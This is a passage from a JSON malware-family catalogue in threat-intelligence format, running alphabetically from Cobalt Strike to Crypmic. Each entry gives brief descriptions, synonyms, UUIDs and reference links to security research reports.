"https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", "https://www.secureworks.com/research/threat-profiles/gold-dupont", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", "https://www.cobaltstrike.com/support", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", "https://blog.cobaltstrike.com/", "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", "https://www.macnica.net/file/mpression_automobile.pdf", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://mez0.cc/posts/cobaltstrike-powershell-exec/", "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", "https://twitter.com/redcanary/status/1334224861628039169", "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", "https://twitter.com/swisscom_csirt/status/1354052879158571008", "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://connormcgarr.github.io/thread-hijacking/", "https://paper.seebug.org/1301/", "https://web.br.de/interaktiv/ocean-lotus/en/", "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", "https://redcanary.com/blog/getsystem-offsec/", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", "https://twitter.com/TheDFIRReport/status/1359669513520873473", "https://asec.ahnlab.com/ko/19640/", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html" ], "synonyms": [ "Agentemis", "BEACON", "CobaltStrike" ], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", "value": "Cobalt Strike" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" ], "synonyms": [], "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", "value": "Cobian RAT" }, { "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It's CRM mailslot module was also observed being downloaded by ISFB.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.group-ib.com/blog/renaissance", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://www.netscout.com/blog/asert/double-infection-double-fun", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [ "COOLPANTS" ], "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", "value": "CobInt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://github.com/hfiref0x/TDL", "https://www.circl.lu/pub/tr-25/", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon", "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf" ], "synonyms": [ "Carbon" ], "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", "value": "Cobra Carbon System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" ], "synonyms": [], "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", "value": "CockBlocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" ], "synonyms": [], "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", "value": "CodeKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" ], "synonyms": [], "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", "value": "Cohhoc" }, { "description": "Coinminer is an unwanted malicious software which uses the victim's computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim's consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", "https://secrary.com/ReversingMalware/CoinMiner/", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/" ], "synonyms": [], "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", "value": "Coinminer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock", "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html" ], "synonyms": [], "type": [] }, "uuid": "140f271b-0be1-4455-96c6-015632ade33a", "value": "ColdLock" }, { "description": "Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal).\r\nIt was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload.\r\nNote: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal", "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html", "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", "https://www.youtube.com/watch?v=242Tn0IL2jE", "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html" ], "synonyms": [ "ColdSeal" ], "type": [] }, "uuid": "8d5b7766-673c-493f-b760-65afd61689cb", "value": "Cold$eal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba", "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/" ], "synonyms": [], "type": [] }, "uuid": "5c0f96fd-54c0-44cd-9caf-b986e3fa2879", "value": "CollectorGoomba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" ], "synonyms": [ "Bandios", "GrayBird" ], "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", "value": "Colony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" ], "synonyms": [], "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", "value": "Combojack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", "value": "Combos" }, { "description": "This malware was found in a backdoored Visual Studio project that was used to target security researchers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker", "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/", "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/", "https://www.anquanke.com/post/id/230161", "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/", "https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/" ], "synonyms": [], "type": [] }, "uuid": "44240b4b-09d3-4b6b-a077-bce00c35ea38", "value": "ComeBacker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo", "https://www.secureworks.com/research/secrets-of-the-comfoo-masters" ], "synonyms": [], "type": [] }, "uuid": "f5044eda-3119-4fcf-b8af-9b56ab66b9be", "value": "Comfoo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" ], "synonyms": [], "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", "value": "ComodoSec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun", "https://securelist.com/compfun-successor-reductor/93633/", "https://securelist.com/compfun-http-status-based-trojan/96874/", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [ "Reductor RAT" ], "type": [] }, "uuid": "541d5642-0648-4b5a-97b9-81110f273771", "value": "COMpfun" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/" ], "synonyms": [ "lojack" ], "type": [] }, "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", "value": "Computrace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", "https://twitter.com/struppigel/status/816926371867926528" ], "synonyms": [], "type": [] }, "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", "value": "ComradeCircle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" ], "synonyms": [], "type": [] }, "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", "value": "concealment_troy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", "https://github.com/tillmannw/cnfckr", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ "Kido", "downadup", "traffic converter" ], "type": [] }, "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", "value": "Conficker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], "type": [] }, "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", "value": "Confucius" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/", "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/", "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://github.com/cdong1012/ContiUnpacker", "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware" ], "synonyms": [], "type": [] }, "uuid": "c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c", "value": "Conti Ransomware" }, { "description": "FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", "https://content.fireeye.com/apt/rpt-apt38", "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" ], "synonyms": [ "WHITEOUT" ], "type": [] }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", "value": "Contopee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", "value": "CookieBag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/" ], "synonyms": [], "type": [] }, "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html", "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content", "https://blog.alyac.co.kr/2105" ], "synonyms": [], "type": [] }, "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5", "value": "CoreDN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", "http://malware.prevenity.com/2014/08/malware-info.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" ], "synonyms": [ "SOURFACE" ], "type": [] }, "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", "value": "Coreshell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware", "https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html" ], "synonyms": [ "CoronaVirus Cover-Ransomware" ], "type": [] }, "uuid": "ba683942-1524-459a-ad46-827464967164", "value": "CoronaVirus Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx", "https://www.youtube.com/watch?v=1WfPlgtfWnQ", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://vblocalhost.com/uploads/VB2020-20.pdf", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" ], "synonyms": [], "type": [] }, "uuid": "47190b56-5176-4e8b-8c78-fcc10e511fa2", "value": "Cotx RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli", "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" ], "synonyms": [ "Covically" ], "type": [] }, "uuid": "e8986c0c-2997-425d-ae4e-529f82d3fa48", "value": "Covicli" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper", "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/", "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html" ], "synonyms": [], "type": [] }, "uuid": "4d7d8496-52a6-47dc-abfe-4997af6dc465", "value": "CoViper" }, { "description": "CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot", "https://content.fireeye.com/apt-41/rpt-apt41/" ], "synonyms": [], "type": [] }, "uuid": "cfa111c1-3740-4832-8e89-12a536f4fff9", "value": "crackshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore" ], "synonyms": [], "type": [] }, "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", "value": "CradleCore" }, { "description": "According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat", "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html" ], "synonyms": [], "type": [] }, "uuid": "ca901b56-b733-44af-aee2-38da79188dcb", "value": "CRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86", "value": "CREAMSICLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", "value": "Credraptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" ], "synonyms": [], "type": [] }, "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", "value": "Crenufs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", "https://s.tencent.com/research/report/669.html", "https://blog.yoroi.company/research/transparent-tribe-four-years-later", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF", "https://securelist.com/transparent-tribe-part-2/98233/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.secrss.com/articles/24995", "https://twitter.com/teamcymru/status/1351228309632385027", "https://securelist.com/transparent-tribe-part-1/98127/", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/" ], "synonyms": [ "SEEDOOR", "Scarimson" ], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", "value": "Crimson RAT" }, { "description": "According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias", "https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/" ], "synonyms": [], "type": [] }, "uuid": "6f2a68d1-06a9-4657-98d8-590a6446e475", "value": "CrimsonIAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring", "https://twitter.com/swisscom_csirt/status/1354052879158571008" ], "synonyms": [], "type": [] }, "uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744", "value": "Cring Ransomware" }, { "description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.youtube.com/watch?v=8x-pGlWpIYI", "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://content.fireeye.com/apt-41/rpt-apt41/", "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", "https://twitter.com/MrDanPerez/status/1159459082534825986" ], "synonyms": [ "Motnug", "ProxIP" ], "type": [] }, "uuid": "7ca7c08b-36fd-46b3-8b9e-a8b0d4743433", "value": "CROSSWALK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch", "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" ], "synonyms": [], "type": [] }, "uuid": "e7dc138f-00cb-4db6-a6e7-3ecac853285d", "value": "Crutch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://hackmag.com/security/ransomware-russian-style/", "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", "https://twitter.com/albertzsigovits/status/1217866089964679174", "https://twitter.com/bartblaze/status/1305197264332369920", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html", "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/", "https://twitter.com/demonslay335/status/971164798376468481" ], "synonyms": [ "CryLock" ], "type": [] }, "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", "value": "Cryakl" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" ], "synonyms": [], "type": [] }, "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", "value": "CryLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] }, "uuid": 